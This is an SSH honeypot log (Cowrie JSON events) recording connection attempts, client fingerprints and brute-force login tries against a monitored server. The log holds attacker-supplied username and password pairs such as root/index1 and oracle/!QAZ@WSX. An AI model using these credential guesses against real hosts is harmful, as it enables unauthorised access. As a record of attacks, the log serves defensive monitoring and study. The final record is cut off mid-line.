{"eventid":"cowrie.session.closed","duration":"15.9","message":"Connection lost after 15.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:37:00.327914Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:37:01.759099Z","src_ip":"51.79.164.132","session":"803b2dbc6344"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:37:03.339804Z","src_ip":"51.79.164.132","session":"803b2dbc6344"}
{"eventid":"cowrie.session.closed","duration":12.766761302947998,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:37:07.791117Z","src_ip":"201.223.189.52","session":"5661f82aa353"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":50370,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8d27a190c9b","protocol":"ssh","message":"New connection: 51.79.164.132:50370 (1.2.3.4:22) [session: f8d27a190c9b]","sensor":"my-vps","timestamp":"2025-08-28T08:37:26.395332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:37:26.527274Z","src_ip":"51.79.164.132","session":"f8d27a190c9b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:37:27.147107Z","src_ip":"51.79.164.132","session":"f8d27a190c9b"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T08:37:28.529881Z","src_ip":"51.79.164.132","session":"f8d27a190c9b"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:37:30.115022Z","src_ip":"51.79.164.132","session":"f8d27a190c9b"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":50342,"dst_ip":"1.2.3.4","dst_port":22,"session":"36e44e11b9f8","protocol":"ssh","message":"New connection: 185.93.89.7:50342 (1.2.3.4:22) [session: 36e44e11b9f8]","sensor":"my-vps","timestamp":"2025-08-28T08:37:35.416366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:37:35.418261Z","src_ip":"185.93.89.7","session":"36e44e11b9f8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:37:35.440736Z","src_ip":"185.93.89.7","session":"36e44e11b9f8"}
{"eventid":"cowrie.login.success","username":"root","password":"index1","message":"login attempt [root/index1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:37:35.506335Z","src_ip":"185.93.89.7","session":"36e44e11b9f8"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:37:35.555919Z","src_ip":"185.93.89.7","session":"36e44e11b9f8"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":51362,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf89a5a1a26b","protocol":"ssh","message":"New connection: 185.93.89.7:51362 (1.2.3.4:22) [session: bf89a5a1a26b]","sensor":"my-vps","timestamp":"2025-08-28T08:37:44.847383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:37:44.848377Z","src_ip":"185.93.89.7","session":"bf89a5a1a26b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:37:44.866257Z","src_ip":"185.93.89.7","session":"bf89a5a1a26b"}
{"eventid":"cowrie.login.success","username":"root","password":"Index1","message":"login attempt [root/Index1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:37:44.905029Z","src_ip":"185.93.89.7","session":"bf89a5a1a26b"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:37:44.923762Z","src_ip":"185.93.89.7","session":"bf89a5a1a26b"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":35068,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ff115f2c237","protocol":"ssh","message":"New connection: 51.79.164.132:35068 (1.2.3.4:22) [session: 9ff115f2c237]","sensor":"my-vps","timestamp":"2025-08-28T08:37:52.805850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:37:53.129286Z","src_ip":"51.79.164.132","session":"9ff115f2c237"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:37:53.158463Z","src_ip":"51.79.164.132","session":"9ff115f2c237"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-28T08:37:54.842102Z","src_ip":"51.79.164.132","session":"9ff115f2c237"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:37:56.401664Z","src_ip":"51.79.164.132","session":"9ff115f2c237"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":58910,"dst_ip":"1.2.3.4","dst_port":22,"session":"77687ce3725c","protocol":"ssh","message":"New connection: 51.79.164.132:58910 (1.2.3.4:22) [session: 77687ce3725c]","sensor":"my-vps","timestamp":"2025-08-28T08:38:18.831082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:38:19.022034Z","src_ip":"51.79.164.132","session":"77687ce3725c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:38:19.022810Z","src_ip":"51.79.164.132","session":"77687ce3725c"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":49822,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc704b8132f0","protocol":"ssh","message":"New connection: 185.93.89.7:49822 (1.2.3.4:22) [session: cc704b8132f0]","sensor":"my-vps","timestamp":"2025-08-28T08:38:20.554824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:38:20.555478Z","src_ip":"185.93.89.7","session":"cc704b8132f0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:38:20.573713Z","src_ip":"185.93.89.7","session":"cc704b8132f0"}
{"eventid":"cowrie.login.success","username":"root","password":"index1!","message":"login attempt [root/index1!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:38:20.612010Z","src_ip":"185.93.89.7","session":"cc704b8132f0"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:38:20.632823Z","src_ip":"185.93.89.7","session":"cc704b8132f0"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T08:38:20.885852Z","src_ip":"51.79.164.132","session":"77687ce3725c"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:38:22.496330Z","src_ip":"51.79.164.132","session":"77687ce3725c"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":49836,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e167b96d3e8","protocol":"ssh","message":"New connection: 185.93.89.7:49836 (1.2.3.4:22) [session: 3e167b96d3e8]","sensor":"my-vps","timestamp":"2025-08-28T08:38:29.654010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:38:29.655019Z","src_ip":"185.93.89.7","session":"3e167b96d3e8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:38:29.675234Z","src_ip":"185.93.89.7","session":"3e167b96d3e8"}
{"eventid":"cowrie.login.success","username":"root","password":"Index1!","message":"login attempt [root/Index1!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:38:29.712677Z","src_ip":"185.93.89.7","session":"3e167b96d3e8"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:38:29.732643Z","src_ip":"185.93.89.7","session":"3e167b96d3e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34171,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bd2b21bffef","protocol":"ssh","message":"New connection: 212.227.125.160:34171 (1.2.3.4:22) [session: 1bd2b21bffef]","sensor":"my-vps","timestamp":"2025-08-28T08:38:37.938235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.1","message":"Remote SSH version: SSH-2.0-libssh-0.1","sensor":"my-vps","timestamp":"2025-08-28T08:38:38.208373Z","src_ip":"212.227.125.160","session":"1bd2b21bffef"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:38:38.478951Z","src_ip":"212.227.125.160","session":"1bd2b21bffef"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":48666,"dst_ip":"1.2.3.4","dst_port":22,"session":"45885b5966d3","protocol":"ssh","message":"New connection: 51.79.164.132:48666 (1.2.3.4:22) [session: 45885b5966d3]","sensor":"my-vps","timestamp":"2025-08-28T08:38:44.763119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:38:44.946014Z","src_ip":"51.79.164.132","session":"45885b5966d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:38:45.493400Z","src_ip":"51.79.164.132","session":"45885b5966d3"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T08:38:46.865624Z","src_ip":"51.79.164.132","session":"45885b5966d3"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:38:48.577284Z","src_ip":"51.79.164.132","session":"45885b5966d3"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":44088,"dst_ip":"1.2.3.4","dst_port":22,"session":"da3ba7a164ac","protocol":"ssh","message":"New connection: 185.93.89.7:44088 (1.2.3.4:22) [session: da3ba7a164ac]","sensor":"my-vps","timestamp":"2025-08-28T08:39:05.312416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:39:05.313339Z","src_ip":"185.93.89.7","session":"da3ba7a164ac"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"